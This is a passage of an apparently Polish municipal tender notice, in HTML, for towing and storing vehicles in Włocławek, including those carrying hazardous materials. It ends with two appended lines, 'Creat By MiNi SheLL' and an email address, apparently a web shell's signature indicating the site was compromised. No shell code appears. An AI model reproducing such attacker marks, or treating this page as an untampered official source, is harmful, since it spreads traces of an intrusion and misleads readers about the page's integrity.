- zabezpieczenie pojazdu i części pojazdu przed jego uszkodzeniem, zniszczeniem, kradzieżą w czasie transportu oraz przechowywania na parkingu a także, w przypadku pojazdów uszkodzonych, zabezpieczenie ich przed działaniem czynników pogodowych,
- przechowywanie w zabezpieczonym pomieszczeniu wyposażenia pojazdu, części lub innych elementów zabezpieczonego pojazdu, które zostały oddzielone od pojazdu i mogłyby ulec zniszczeniu lub zaginięciu w miejscu do przechowywania pojazdów,
- informowanie osoby uprawnionej do odbioru pojazdu o wysokości opłat i procedurach związanych z odbiorem pojazdu z parkingu oraz przekazanie mu ulotek informacyjnych i instrukcji postępowania otrzymanych od Zamawiającego, a jeśli Wykonawca posiada stronę internetową, to również umieszczenie na niej ww. ulotek informacyjnych i instrukcji postępowania
- wydanie lub przekazanie pojazdu,
- recykling pojazdu usuniętego w trybie art. 50a Ustawy, po upływie okresu przechowywania, określonego przepisami..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.11.81.10-9, 98.35.11.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Usuwanie pojazdów z ulic miasta Włocławek oraz ich przechowywanie na parkingu strzeżonym, zgodnie z ustawą Prawo o ruchu drogowym - wszystkich bez względu na masę całkowitą, przewożących materiały niebezpieczne.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> W zakres usług będących przedmiotem zamówienia wchodzi usuwanie i przechowywanie pojazdów wszystkich typów oraz przekazywanie, na wniosek Zamawiającego, do recyklingu pojazdów porzuconych, usuwanych z dróg leżących na terenie miasta Włocławek w trybie art. 50a i 130a ustawy 
z dnia 20 czerwca 1997 roku Prawo o ruchu drogowym (j. t. Dz. U. z 2012 r., poz. 1137 z późn. zm.), zwanej dalej Ustawą, z możliwością składania ofert częściowych na poszczególne zadania. 
Usunięcie pojazdu z drogi odbywać się będzie zgodnie z zasadami sztuki i przy ścisłym przestrzeganiu zasad bezpieczeństwa i przepisów prawa. Co najmniej będziemy mieli do czynienia z holowaniem, 
o którym mowa w art. 31 ust. 3 ustawy z dnia 20 czerwca 1997 roku Prawo o ruchu drogowym 
(j. t. Dz. U. z 2012 r. poz. 1137 z późn. zm.), zwanej dalej Ustawą, to jest holowaniem pojazdu w sposób wykluczający potrzebę kierowania nim lub użycia hamulców (np. gdy unieruchomione są koła pędne  i spoczywają na urządzeniu holowniczym). Do holowania pojazdów winien być wykorzystywany sprzęt specjalistyczny przeznaczony do tego rodzaju zadań z uwzględnieniem zasady, iż rzeczywista masa całkowita pojazdu holowanego nie może przekraczać rzeczywistej masy całkowitej pojazdu holującego. Przechowywanie pojazdów winno się odbywać na parkingu strzeżonym, odpowiednio ogrodzonym, oświetlonym oraz monitorowanym. Pojazdy uszkodzone winny być zabezpieczone w sposób niezagrażający środowisku, a jednocześnie tak, by ich stan nie ulegał znacznemu pogorszeniu poprzez parkowanie. Parking winien posiadać odpowiednią liczbę miejsc, która pozwoli na swobodne przechowywanie powierzonej liczby pojazdów. Wykonawca będzie zobowiązany do realizowania przedmiotu zamówienia 24 godziny na dobę,  przez 7 dni w tygodniu. W zakres usługi będącej przedmiotem zamówienia tj. usunięcia i przechowywania pojazdu wchodzi,  w szczególności:
- dojazd do miejsca zdarzenia w granicach administracyjnych miasta, w celu zrealizowania każdej dyspozycji usunięcia pojazdu oraz bez względu na warunki pogodowe,
- sporządzenie szczegółowej dokumentacji fotograficznej każdego pojazdu aparatem cyfrowym przed jego załadunkiem - co najmniej cztery zdjęcia z każdej strony pojazdu a w przypadku gdy pojazd posiada uszkodzenia - również zdjęcia tych uszkodzeń,
- wyciąganie pojazdu spoza jezdni o ile jest to konieczne w celu usunięcia pojazdu z miejsca zdarzenia,
- załadunek, rozładunek oraz inne czynności związane z załadunkiem i wyładunkiem pojazdu,
- uprzątnięcie miejsca zdarzenia z części, przedmiotów i płynów pochodzących z uszkodzonych pojazdów (z wyjątkiem konieczności użycia specjalistycznego sprzętu znajdującego się w pojazdach do tego przystosowanych, np. Straży Pożarnej),
- holowanie (holowanie pojazdu w sposób wykluczający potrzebę kierowania nim lub użycia hamulców), przewóz pojazdu na parking Wykonawcy,
- ewentualne odstąpienie od usunięcia pojazdu, na polecenie podmiotu, który wydał dyspozycję usunięcia pojazdu, w przypadku ustania przyczyny jego usunięcia,
- prowadzenie parkingu strzeżonego, na którym będą przechowywane pojazdy,
- umożliwienie osobom upoważnionym, w szczególności przedstawicielom Zamawiającego, do dokonywania oględzin na terenie parkingu zabezpieczonego pojazdu,
- umożliwienie osobom upoważnionym, w szczególności przedstawicielom Zamawiającego, kontroli pracy Wykonawcy na każdym jej etapie, w tym warunków przechowywania pojazdów, 
- zabezpieczenie pojazdu i części pojazdu przed jego uszkodzeniem, zniszczeniem, kradzieżą  w czasie transportu oraz przechowywania na parkingu a także, w przypadku pojazdów uszkodzonych, zabezpieczenie ich przed działaniem czynników pogodowych,
- przechowywanie w zabezpieczonym pomieszczeniu wyposażenia pojazdu, części lub innych elementów zabezpieczonego pojazdu, które zostały oddzielone od pojazdu i mogłyby ulec zniszczeniu lub zaginięciu w miejscu do przechowywania pojazdów,
- informowanie osoby uprawnionej do odbioru pojazdu o wysokości opłat i procedurach związanych z odbiorem pojazdu z parkingu oraz przekazanie mu ulotek informacyjnych i instrukcji postępowania otrzymanych od Zamawiającego, a jeśli Wykonawca posiada stronę internetową, to również umieszczenie na niej ww. ulotek informacyjnych i instrukcji postępowania
- wydanie lub przekazanie pojazdu,
- recykling pojazdu usuniętego w trybie art. 50a Ustawy, po upływie okresu przechowywania, określonego przepisami..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.11.81.10-9, 98.35.11.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com